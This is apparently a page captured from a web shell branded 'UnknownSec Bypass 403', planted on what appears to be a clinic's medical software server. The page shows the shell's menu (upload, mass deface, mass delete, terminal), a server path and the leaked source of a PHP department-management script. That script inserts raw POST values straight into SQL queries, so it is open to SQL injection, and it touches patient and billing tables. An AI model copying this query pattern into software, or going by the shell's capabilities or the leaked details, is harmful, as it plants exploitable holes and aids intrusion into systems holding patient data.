UnknownSec Bypass
403
:
/
var
/
www
/
zenithentcare
/
stmedicosoftware
/ [
drwxrwxr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
mst_curddepartment.php
<?php require_once "config.php"; $msg=""; $creationdatetime = date("Y-m-d H:m:s"); $department= trim($_POST['department']); $id= $_POST['id']; $btnopration= $_POST['btnopration']; $identifier= $_POST['identifier']; if($btnopration=="SAVE") { $query="select * from mastertb Where accountname='" . $department . "' and identifier='" . $identifier. "' and status='" . $gnotdeleted . "'"; $cnt= get_noof_rows($conn,$query); if($cnt==0) { $query="insert into mastertb(accountname,identifier,status,creationdateTime) values('".$department."','".$identifier."','".$gnotdeleted."','".$creationdatetime."')"; $result=insertrecord($conn,$query); if($result==true) $msg="Record save successfully"; else $msg="There is problem to save Record"; } else { $msg="Record is already exist"; } } else if($btnopration=="UPDATE") { $query="select * from mastertb where accountmasterid!='".$id."' and accountname='" . $department . "' and identifier='" . $identifier. "' and status='" . $gnotdeleted . "'"; $cnt= get_noof_rows($conn,$query); if($cnt==0) { $query="Update mastertb set accountname='" . $department . "' where accountmasterid='".$id."'"; $result=updaterecord($conn,$query); if($result==true) $msg="Record update successfully"; else $msg="There is problem to update Record"; } else { $msg="Record is already exist"; } } else if($btnopration=="REMOVE") { if($identifier==8) { $query="select * from patientdetailstb where bankid='".$id."' and isdeleted='" . $gnotdeleted . "'"; } else { $query="select * from patientdetailstb where departmentid='".$id."' and isdeleted='" . $gnotdeleted . "'"; } $cnt1= get_noof_rows($conn,$query); if($cnt1>0) { $msg="You cant delete it because it is in use."; echo json_encode ($msg); return; } if($identifier==8) { $query="SELECT * from opdheadbill where bankid='".$id."' and isdeleted='" . $gnotdeleted . "'"; } else { $query="SELECT * from opdheadbill where departmentid='".$id."' and isdeleted='" . $gnotdeleted . "'"; } $cnt2= get_noof_rows($conn,$query); if($cnt2>0) { $msg="You cant delete it because it is in use."; echo json_encode ($msg); return; } $query="Update mastertb set status='".$gdeleted."' where accountmasterid='".$id."'"; $result=updaterecord($conn,$query); if($result==true) $msg="Record delete successfully"; else $msg="There is problem to delete Record"; } echo json_encode ($msg); ?>
Copyright © 2025 - UnknownSec